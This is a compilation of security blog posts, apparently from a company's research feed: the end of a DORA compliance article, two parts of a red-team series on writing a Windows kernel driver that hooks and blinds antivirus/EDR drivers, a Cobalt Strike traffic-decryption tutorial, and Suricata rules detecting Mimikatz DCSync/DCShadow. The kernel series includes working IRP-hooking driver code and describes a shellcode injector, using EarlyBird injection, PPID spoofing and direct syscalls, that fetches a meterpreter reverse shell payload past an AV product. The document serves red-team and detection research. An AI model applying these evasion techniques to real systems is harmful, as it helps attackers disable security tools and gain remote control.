From another cultural standpoint, a resilience testing program should not be perceived as a single goal, nor as a binary concept (either it is in place or it is not). As stated, the underlying idea behind DORA is rather about identifying weaknesses, deficiencies or gaps, and admitting that a breach might happen or a vulnerability could go undetected. DORA is therefore more about preparing to withstand just such a possibility.

2. Second, as stated, significant financial entities (possibly firms already in the scope of the NIS regulation) will have to implement a threat-led penetration testing program and exercise. It is likely that this first exercise will have to be organized by the end of 2024. This might seem like a sufficient period of time for these tests to be conducted; however, consider that these types of tests require a lot of preparation. First, all EU-based critical ICT third parties are required to be involved. This means that all of these third parties should also be involved in the preparation of this exercise, which will require a lot of coordination and planning beforehand. Second, the scenario for these threat-led penetration testing exercises will have to be agreed with the regulator in advance. Significant financial entities should therefore start thinking about the scenario as soon as possible, to enable validation with the regulator at least 2 years before the deadline.

In a coming blogpost, we will be reviewing the requirements associated with the Resilience Testing of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT Third-Party Risk Management

DORA introduces requirements on the governance of third-party service providers and the management of third-party risks. DORA states that financial entities should have an appropriate level of control over, and monitoring of, their ICT third parties. This process is reflected in Chapter 5 of the regulation.

What is required?

Chapter 5 addresses the key principles for a sound management of ICT Third-Party risks. In a nutshell, the main requirements associated with these key principles could be described as the following:

  • Obligatory Contractual Provisions:
    • DORA introduces obligatory provisions that have to be present in any contract concluded between a financial institution and an ICT third-party provider.
  • ICT third-party risk strategy definition:
    • Firms shall define a multi-vendor ICT third-party risk strategy and policy, owned by a member of the management body.
  • Maintenance of a Register of Information:
    • Firms shall define and maintain a register of information that contains the full view of all their ICT third-party providers, the services they provide and the functions they underpin, according to the key contractual provisions.
  • Performing due diligence/assessments:
    • Firms shall assess ICT service providers according to certain criteria (e.g. security level, concentration risk, sub-outsourcing risks) before entering into a contractual arrangement on the use of ICT services.

What do we consider as potential challenges for most organizations?

We foresee several elements that might rise additional complexity:

1. One of the main challenges that we foresee relates to the assembling and maintenance of the Register of Information. Financial entities will have to collect information on all ICT vendors (not only the most critical).  

This might create additional complexity, as DORA states that this register shall be maintained at entity level, as well as at sub-consolidated and consolidated levels. DORA also states that this register shall include all contractual arrangements on the use of ICT services, identifying the services the third party provides and the functions they underpin.

This requirement could be considered a challenge, on the one hand for large financial entities that rely on thousands of big and small providers, and on the other hand for smaller, less mature financial institutions that will have to ensure that the register of information is complete and accurate.

Some other challenges also have to be foreseen.

2. Contracts with all ICT providers will probably need to be amended. For “EBA” critical contracts this will be covered through the EBA directive on this topic; however, for others (if all ICT providers are affected) this will not yet be the case. Identifying those contracts and upgrading them will be a challenge.

3. Regarding the exit strategy, and following the same reasoning: for “EBA” critical contracts this will be covered through the EBA directive, but for others this might not yet be the case. Determining how to enforce this requirement in these contracts will also create additional complexity.

4. Determining a correct risk-based approach for performing assessments of the ICT providers will possibly add complexity as well. Performing assessments of all ICT providers is not feasible; ICT providers will have to be prioritized based on criticality criteria that will have to be defined.

In a coming blogpost, we will be reviewing the requirements associated with the ICT Third-Party Risk Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Information and Intelligence Sharing

DORA promotes information-sharing arrangements on cyber threat information and intelligence. This process is reflected in Chapter 6 of the regulation.

What is required?

DORA introduces guidelines on setting up information sharing arrangements between firms to exchange among themselves cyber threat information and intelligence on tactics, techniques, procedures, alerts and configuration tools in a trusted environment.

What do we consider as potential challenges for most organizations?

While many organisations already have such arrangements in place, challenges might still emerge, such as:

  • How will you determine what information to share? There should be a balance between helping the community and ensuring alignment with laws and regulations, as well as not sharing sensitive information with competitors.
  • How will you share this information efficiently?
  • What processes will you set up to consume the information shared by other entities?

Preparing yourself

In order to be ready, we recommend organisations take the following steps in 2021 and 2022:

  • Conduct a maturity assessment against the DORA requirements and define a mitigation plan to reach compliance.
  • Start consolidating the register of information for all ICT third-party providers.
  • Start defining a potential scenario for the large-scale penetration test.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his hands-on technical experience as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest in IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He has hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering.

Find out more about Nicolas on Linkedin.


Kernel Karnage – Part 4 (Inter(ceptor)mezzo)

By: bautersj

To make up for the long wait between parts 2 and 3, we’re releasing another blog post this week. Part 4 is a bit smaller than the others, an intermezzo between parts 3 and 5 if you will, discussing Interceptor.

1. RTFM & W(rite)TFM!

The past few weeks I spent a lot of time getting acquainted with the Windows kernel and the inner workings of certain EDR/AV products. I also covered the two main methods of attacking EDR/AV drivers, namely kernel callback patching and IRP MajorFunction hooking. I’ve been working on my own driver called Interceptor, which will implement both these techniques, as well as a method to load itself into kernel memory while bypassing Driver Signing Enforcement (DSE).

I’m of the opinion that when writing tools or exploits, the author should know exactly what each part of his/her/their code is responsible for and how it works, and should avoid copy-pasting code from similar projects without fully understanding it. With that said, I’m writing Interceptor based on numerous other projects, so I’m taking my time to go through their associated blogposts and understand their workings and purpose.

Interceptor currently supports IRP hooking/unhooking drivers by name or by index based on loaded modules.

Using the -l option, Interceptor will list all the currently loaded modules on the system and assign them an index. This index can be used to hook the module with the -h option.

Using the -lh option, Interceptor will list all the currently hooked modules with their corresponding index in the global hooked drivers array. Interceptor currently supports hooking up to 64 drivers. The index can be used with the -u option to unhook the module.

Interceptor list hooked drivers
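Put together, a typical session could look something like this (the invocations below are our own sketch, not verbatim CLI output):

InterceptorCLI.exe -l      //list all currently loaded modules, each with an index
InterceptorCLI.exe -h 12   //hook the module at index 12
InterceptorCLI.exe -lh     //list all hooked modules and their index in the hooked drivers array
InterceptorCLI.exe -u 0    //unhook the module at index 0 of that array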

Once a module is hooked, Interceptor’s InterceptGenericDispatch() function will be called whenever an IRP is received. The current implementation notifies via a debug message that a call was intercepted, and then calls the original completion routine. I’m currently working on a method to inspect and modify the IRPs before passing them to their completion routine.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if (isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
        return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

I’m also working on a module that supports patching kernel callbacks. The difficulty here is locating the different callback arrays by enumerating their calling functions and looking for certain opcode patterns, which change between different versions of Windows.

As mentioned in one of my previous blogposts, locating the callback arrays for PsSetCreateProcessNotifyRoutine() and PsSetCreateThreadNotifyRoutine() is done by looking for a CALL instruction to PspSetCreateProcessNotifyRoutine() and PspSetCreateThreadNotifyRoutine() respectively, followed by looking for a LEA instruction.

Finding the callback array for PsSetLoadImageNotifyRoutine() is slightly different as the function first jumps to PsSetLoadImageNotifyRoutineEx(). Next, we skip looking for the CALL instruction and go straight for the LEA instruction instead, which puts the callback array address into RCX.

LoadImage callback array

Interceptor’s callback module currently implements patching functionality for Process and Thread callbacks.

The registered callbacks on the system and their patch status can be listed using the -lc command.

2. Conclusion

In the previous blogpost of this series, we combined the functionality of two drivers, Evilcli and Interceptor, to partially bypass $vendor2. In this post we took a closer look at Interceptor’s capabilities and future features that are in development. In the upcoming blogposts, we’ll see how Interceptor as a fully standalone driver is able to conquer not just $vendor2, but other EDR products as well.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.


Cobalt Strike: Decrypting Obfuscated Traffic – Part 4

By: Didier Stevens

Encrypted Cobalt Strike C2 traffic can be obfuscated with malleable C2 data transforms. We show how to deobfuscate such traffic.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. And in part 3, we explained how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

In the first 3 parts of this series, we have always looked at traffic that contains the unaltered, encrypted data: the data returned for a query and the data posted were just the encrypted data.

This encrypted data can be transformed into traffic that looks more benign, using malleable C2 data transforms. In the example we will look at in this blog post, the encrypted data is hidden inside JavaScript code.

But how do we know if a beacon is using such instructions to obfuscate traffic, or not? This can be seen in the analysis results of the latest version of tool 1768.py. Let’s take a look at the configuration of the beacon we started with in part 1:

Figure 1: beacon with default malleable C2 instructions

We see for field 0x000b (malleable C2 instructions) that there is just one instruction: Print. This is the default, and it means that the encrypted data is received as-is by the beacon: it does not need any transformation prior to decryption.

And for field 0x000d (http post header), we see that the Build Output is also just one instruction: Print. This is the default, and it means that the encrypted data is transmitted as-is by the beacon: it does not need any transformation after encryption.

Let’s take a look at a sample with custom malleable C2 data transforms:

Figure 2: beacon with custom malleable C2 instructions

Here we see more than just a Print instruction: “Remove 1522 bytes from end”, “Remove 84 bytes from begin”, …

These are instructions to transform (deobfuscate) the incoming traffic, so that it can then be decrypted. To understand in detail how this works, we will do the transformation manually with CyberChef. However, do know that tool cs-parse-http-traffic.py can do these transformations automatically.

This is the network capture for a single GET request by the beacon and reply from the team server (C2):

Figure 3: reply transformed with malleable C2 instructions to look like JavaScript code

What we see here, is a GET request by the beacon to the C2 (notice the Cookie with the encrypted metadata) and the reply by the C2. This reply looks like JavaScript code, because of the malleable C2 data transforms that have been used to make it look like JavaScript code.

We copy this reply over to CyberChef in its input field:

Figure 4: CyberChef with obfuscated input

The instructions we need to follow, to deobfuscate this reply, are listed in tool 1768.py’s output:

Figure 5: decoding instructions

So let’s get started. First we need to remove 1522 bytes from the end of the reply. This can be done with a CyberChef drop bytes function and a negative length (negative length means dropping from the end):

Figure 6: dropping 1522 bytes from the end

Then, we need to remove 84 bytes from the beginning of the reply:

Figure 7: dropping 84 bytes from the beginning

And then also dropping 3931 bytes from the beginning:

Figure 8: dropping 3931 bytes from the beginning

And now we end up with output that looks like BASE64 encoded data. Indeed, the next instruction is to apply a BASE64 decoding instruction (to be precise: BASE64 encoding for URLs):

Figure 9: decoding BASE64/URL data

The next instruction is to XOR the data. To do that, we need the XOR key. The malleable C2 XOR instruction uses a 4-byte long random key that is prepended to the XORed data. So to recover this key, we convert the binary output to hexadecimal:

Figure 10: hexadecimal representation of the transformed data

The first 4 bytes are the XOR key: b7 85 71 17

We use that with CyberChef’s XOR command:

Figure 11: XORed data

Notice that the first 4 bytes are NULL bytes now: that is as expected, XORing bytes with themselves gives NULL bytes.

And finally, we drop these 4 NULL bytes:

Figure 12: fully transformed data
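Expressed in code, this reverse XOR transform (including dropping the 4 key bytes) could look like the following minimal sketch of ours:

#include <cstddef>
#include <cstdint>
#include <vector>

//the first 4 bytes of the transformed data are the XOR key itself;
//every subsequent byte is XORed with the key byte at its position modulo 4
std::vector<uint8_t> XorDecode(const std::vector<uint8_t>& data) {
    std::vector<uint8_t> out;
    for (std::size_t i = 4; i < data.size(); i++)
        out.push_back(data[i] ^ data[i % 4]);
    return out;
}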

What we end up with is the encrypted data that contains the C2 commands to be executed by the beacon. This is the result of deobfuscating the data by following the malleable C2 data transforms. Now we can proceed with the decryption using a process memory dump, just like we did in part 3.

Figure 13: extracting the cryptographic keys from process memory

Tool cs-extract-key.py is used to extract the AES and HMAC keys from process memory: it fails, as it is not able to find the keys in process memory.

One possible explanation for the keys not being found is that the process memory is encoded. Cobalt Strike supports a feature for beacons called a sleep mask. When this feature is enabled, the process memory with the data of a beacon (including the keys) is XOR-encoded while the beacon sleeps. Thus, only when a beacon is active (communicating or executing commands) will its data be in cleartext.

We can try to decode this process memory dump. Tool cs-analyze-processdump.py is a tool that tries to decode a process memory dump of a beacon that has an active sleep mask feature. Let’s run it on our process memory dump:

Figure 14: analyzing the process memory dump (screenshot 1)
Figure 15: analyzing the process memory dump (screenshot 2)

The tool has indeed found a 13-byte long XOR key, and written the decoded section to disk as a file with extension .bin.

This file can now be used with cs-extract-key.py; it’s exactly the same command as before, but with the decoded section instead of the encoded .dmp file:

Figure 16: extracting keys from the decoded section

And now we have recovered the cryptographic keys.

Notice that in figure 16, the tool reports finding string sha256\x00, while in the first command (figure 13), this string is not found. The absence of this string is often a good indicator that the beacon uses a sleep mask, and that tool cs-analyze-processdump.py should be used prior to extracting the keys.

Now that we have the keys, we can decrypt the network traffic with tool cs-parse-http-traffic.py:

Figure 17: decrypting the traffic fails

This fails: the reason is the malleable C2 data transform. Tool cs-parse-http-traffic.py needs to know which instructions to apply to deobfuscate the traffic prior to decryption. Just like we did manually with CyberChef, tool cs-parse-http-traffic.py needs to do this automatically. This can be done with option -t.

Notice that the output of tool 1768.py contains a short-hand notation of the instructions to execute (between square brackets):

Figure 18: short-hand notations of malleable C2 instructions

For the tasks to be executed (input), it is:

7:Input,4,1:1522,2:84,2:3931,13,15

And for the results to be posted (output), it is:

7:Output,15,13,4

These instructions can be put together (using a semicolon as separator) and fed via option -t to tool cs-parse-http-traffic.py:

Figure 19: decrypted traffic

And now we finally obtain decrypted traffic. There are no actual commands in this traffic, just “data jitter”: random data of random length, designed to obfuscate the traffic even more.

Conclusion

We saw how malleable C2 data transforms are used to obfuscate network traffic, and how we can deobfuscate this network traffic by following the instructions.

We did this manually with CyberChef, but that is of course not practical (we did it to illustrate the concept). To obtain the decoded, encrypted commands, we can also use cs-parse-http-traffic.py. Just like in part 3, we start with an unknown key; the only difference is that we also need to provide the decoding instructions:

Figure 20: extracting and decoding the encrypted data

We can then take one of these 3 pieces of encrypted data to recover the keys.

Thus the procedure is exactly the same as explained in part 3, except that option -t must be used to include the malleable C2 data transforms.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Kernel Karnage – Part 3 (Challenge Accepted)

By: bautersj

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver with callback functionality, which will also cover image load callbacks, used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys -> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
    auto status = STATUS_UNSUCCESSFUL;
    KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if (isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call the original dispatch routine
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto OriginalDispatch = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return OriginalDispatch(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //complete the request ourselves and discard the IRP
        status = STATUS_INVALID_DEVICE_REQUEST;
        return CompleteRequest(Irp, status, 0);
    }
    else {
        //call the original dispatch routine
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto OriginalDispatch = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return OriginalDispatch(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
    for (int i = 0; i < MaxIntercept; i++) {
        if (globals.Drivers[i].DriverObject == DriverObject) {
            if (globals.Drivers[i].DriverUnload) {
                //forward the unload call to the original routine
                globals.Drivers[i].DriverUnload(DriverObject);
            }
            UnhookDriver(i);
        }
    }
    //a hooked driver unloading is unexpected: assert in checked builds
    NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck: mimikatz.exe was still detected and blocked. This got me thinking: running such a well-known malicious binary without any attempt to hide or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I opted for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load, registry and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Detecting DCSync and DCShadow Network Traffic

By: Didier Stevens

This blog post on detecting Mimikatz’ DCSync and DCShadow network traffic, accompanies SANS webinar “Detecting DCSync and DCShadow Network Traffic“.

Intro

Mimikatz provides two commands to interact with a Windows Domain Controller and extract or alter data from the Active Directory database.

These two commands are dcsync and dcshadow.

The dcsync command can be used, on any Windows machine, to connect to a domain controller and read data from AD, like dumping all credentials. This is not an exploit or privilege escalation: the necessary credentials are required to be able to do this, for example a golden ticket.

The dcshadow command can be used, on any Windows machine, to connect to a domain controller and write data to AD, like changing a password or adding a user. This too is not an exploit or privilege escalation: proper domain admin credentials are necessary to achieve this.

Both commands rely on the Active Directory data replication protocol: Directory Replication Service (DRS). This is a protocol (MSRPC / DCE/RPC based) that domain controllers use to replicate their AD database changes between them. The Microsoft API for DRS is DRSUAPI.

Such traffic should only occur between domain controllers. When DRS traffic is detected between a DC and a non-DC (a user workstation, for example), alarms should go off.

Alerting

An Intrusion Detection System can detect DRSUAPI traffic with proper rules.

Figure 1: IDS inspecting traffic between workstation and DC

The IDS needs to be positioned inside the network, at a location where traffic between domain controllers and non-domain controllers can be inspected.

DCE/RPC traffic is complex to parse properly. For example, remote procedure calls are done with an integer that identifies the procedure to call. The name of the function, represented as a string for example, is not used in the DCE/RPC protocol. Furthermore, function integers are only unique within an API: for example, function 0 is the DsBind function in the DRSUAPI interface, but function 0 is also DSAPrepareScript in the DSAOP interface.

A very abstract view of such traffic can be represented like this:

Figure 2: abstraction of DCE/RPC traffic

If an IDS would just see or inspect packet B, it would not be able to determine which function is called. Sure, it is function 0, but for which API? Is it DsBind in the DRSUAPI API or is it DSAPrepareScript in the DSAOP interface? Or another one …

So, the IDS needs to keep track of the interfaces that are requested, and then it can correctly determine which functions are requested.

Alerting dcsync

Here is captured dcsync network traffic, visualized with Wireshark (dcerpc display filter):

Figure 3: DCSync network traffic

Frame 28 is our packet A: requesting the DRSUAPI interface

Frame 41 is our packet B: requesting function DsGetNCChanges

Notice that these packets do belong to the same TCP connection (stream 4).

Thus, a rule would be required that triggers on two different packets. This is not possible in Snort/Suricata: simple rules inspect only one packet.

What is typically done in Suricata for such cases is to make two rules: one for packet A and one for packet B. An alert is only generated when rule B triggers after rule A has triggered.

This can be done with a flowbit. A flowbit is literally a bit kept in memory by Suricata, that can be set or cleared.

These bits are linked to a flow. Simply put, a flow is a set of packets between the same client and server. It’s more generic than a connection.

Thus, what needs to be done to detect dcsync traffic using a flowbit, is to have two rules:

  1. Rule 1: detect packet of type A and set flowbit
  2. Rule 2: detect packet of type B and alert if flowbit is set

Suricata rules that implement such a detection, look like this:

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI"; 
flow:established,to_server; 
content:"|05 00 0b|"; depth:3; 
content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; 
flowbits:set,drsuapi; 
flowbits:noalert; 
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000010; rev:1;)

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI DsGetNCChanges Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|03 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000011; rev:1;)

The first rule (Mimikatz DRSUAPI) is designed to identify a DCERPC Bind to the DRSUAPI API. The packet data has to start with 05 00 0B:

Figure 4: DCERPC packet header

5 is the major version of the protocol, 0 is the minor version, and 0B (11 decimal) is a Bind request.

A UUID is used to identify the DRSUAPI interface (interfaces are identified not with a string like DRSUAPI, but with a UUID that uniquely identifies them):

Figure 5: DRSUAPI UUID

The UUID for DRSUAPI is

e3514235-4b06-11d1-ab04-00c04fc2dcd2

In network packet format, it is

35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2.
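
This byte-order conversion is easy to verify in Python (a quick sketch using the standard uuid module):

import uuid

# the DRSUAPI interface UUID as displayed by Wireshark
drsuapi = uuid.UUID('e3514235-4b06-11d1-ab04-00c04fc2dcd2')

# bytes_le encodes the first three fields in little-endian byte order,
# matching the on-the-wire DCERPC representation
print(drsuapi.bytes_le.hex())  # -> 354251e3064bd111ab0400c04fc2dcd2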

When both content clauses are true, the rule triggers. The action that is triggered is setting a flowbit named drsuapi:

flowbits:set,drsuapi;

A second action is to prevent the rule from generating an alert when setting this flowbit:

flowbits:noalert;

This explains the first rule.

The second rule (Mimikatz DRSUAPI DsGetNCChanges Request) is designed to detect packets with a DRSUAPI request for function DsGetNCChanges. The packet data has to start with 05 00 00:

Figure 6: DRSUAPI Request

5 is the major version of the protocol, 0 is the minor version, and 00 is an RPC request.

And further down in the packet data (position 22 to be precise) the number of the function is specified:

Figure 6: DRSUAPI DsGetNCChanges

Number 3 is DRSUAPI function DsGetNCChanges.

When flowbit drsuapi is set and both content clauses are true, the rule triggers.

flowbits:isset,drsuapi;

And an alert is generated.

Notice that the rule names contain the word Mimikatz, but these rules are not specific to Mimikatz: they will also trigger on regular replication traffic between DCs. The key to use these rules properly, is to make them inspect network traffic between domain controllers and non-domain controllers. Replication traffic should only occur between DCs.

Alerting dcshadow

Mimikatz’ dcshadow command also generates DRSUAPI network traffic, and the rules defined for dcsync also trigger on dcshadow traffic.

One lab in SANS training SEC599, Defeating Advanced Adversaries – Purple Team Tactics & Kill Chain Defenses, covers dcsync and its network traffic detection. If you take this training, you can also try out dcshadow in this lab.

The dcshadow command requires two instances of Mimikatz to run. First, one running as SYSTEM to set up the RPC server:

Figure 7: first instance of Mimikatz for dcshadow (screenshot a)
Figure 8: first instance of Mimikatz for dcshadow (screenshot b)

And a second one running as domain admin to start the replication:

Figure 9: second instance of Mimikatz for dcshadow

This push instruction starts the replication:

Figure 10: second instance of Mimikatz for dcshadow (screenshot b)

dcshadow network traffic looks like this in Wireshark (dcerpc display filter):

Figure 11: dcshadow network traffic

Notice the DRSUAPI bind requests and the DsGetNCChanges requests -> these will trigger the dcsync rules.

DRSUAPI_REPLICA_ADD is also an interesting function to detect: it adds a replication source. The integer that identifies this function is 5.

Figure 12: DRSUAPI_REPLICA_ADD

A rule to detect this function can be created based on the rule to detect DsGetNCChanges.

What needs to be changed:

  1. The opnum: 03 00 -> 05 00
  2. The rule number, sid:1000011 -> sid:1000014 (for example)
  3. And the rule message (preferably): “Mimikatz DRSUAPI DsGetNCChanges Request” -> “Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request”

alert tcp $WORKSTATIONS any -> $DCS any (
msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request";
flow:established,to_server;
flowbits:isset,drsuapi; 
content:"|05 00 00|"; depth:3; 
content:"|05 00|"; offset:22; depth:2;
reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000014; rev:1;)

More generic rules

